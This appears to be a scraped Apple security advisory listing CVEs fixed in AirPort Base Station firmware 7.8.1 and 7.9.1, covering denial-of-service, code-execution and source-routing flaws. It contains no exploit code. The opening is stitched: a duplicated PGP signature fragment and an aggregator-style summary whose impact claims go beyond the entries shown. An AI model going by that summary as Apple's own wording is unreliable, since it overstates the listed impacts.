ZVmolUQCqoB82IwmFt2ZhuQIa2liLv5zOeJuXuZcGQ7GpoEynV8= =VaIH -----END PGP SIGNATURE-----

Source-routed IPv4 packets were disabled by default. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. Source-routed IPv4 packets may be unexpectedly accepted. An attacker can use this vulnerability to cause a denial of service. Attackers can exploit these issues to execute arbitrary code, bypass security restrictions, gain sensitive information and cause denial-of-service conditions. CVE-2019-8581: Lucio Albornoz AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause a system denial of service Description: A null pointer dereference was addressed with improved input validation. CVE-2019-8588: Vince Cali (@0x56) AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause a system denial of service Description: A denial of service issue was addressed with improved validation. CVE-2018-6918: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-8575: joshua stein AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed with improved memory handling. CVE-2019-7291: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: Source-routed IPv4 packets may be unexpectedly accepted Description: Source-routed IPv4 packets were disabled by default. CVE-2019-8580: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause arbitrary code execution Description: A null pointer dereference was addressed with improved input validation. CVE-2019-8572: Maxime Villard Installation note: Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlzwO9kACgkQeC9tht7T K3E14A/+LIUEHIyDAewGNwmeNdmIEg25JJQbn2GheSuEo3toK8OTxxo0JEqIp8wO gDEWxC4WUgLUUliu4QpBl0R3Jy573EF5WEzDF0vl9vP6/AP0X5LT0kkuK7GSpRTA 7N+zvRCRjLYtBsqhRxqDwpDfrCgmjjPTPbjpx/Mk94mpWcLIbmfp8a9JUVXWpm17 60hhkWIc4NP15uZZ1GAt2IiWE8ZnvQ3SiWtj/bbbdw9IX5KRbfyRs/rWOwqqIXpb 1SKZClEfTECZtbCyvg9jFK3hKKUbW/A7rfkCqQGkYPU1O4L5eBQY+o+V9Hkwg6V9 WdqUOLF+bA1NlwqXinBypf0wmLfMImRHEID0w0660T+2+l6sOrJOEZDuMy47ltYi newJ92HL79uvKvz3gkpRS84hrZlcmp7JAS8+c+BV2SriY3J5V8hIAVmjbkxAUOM8 wRv2FJXbvibo5eI+ceYOXZ/gMtsH5trlbskKHCoiYnhqxu4vXnNK4UKik7xn+QtB Q1UxDAA8VmlK9hw/PNrA9RuBsrkxBGj5Hwr0WpiZrmFsDoCiSdjMb3NltSmKL+nd 0TthDSbr7iHTPtkREORvf+4FjGXfwUnOa6/xjAI6JN/RLcjNdqMli6TBUlVMGa2C ZVmolUQCqoB82IwmFt2ZhuQIa2liLv5zOeJuXuZcGQ7GpoEynV8= =VaIH -----END PGP SIGNATURE-----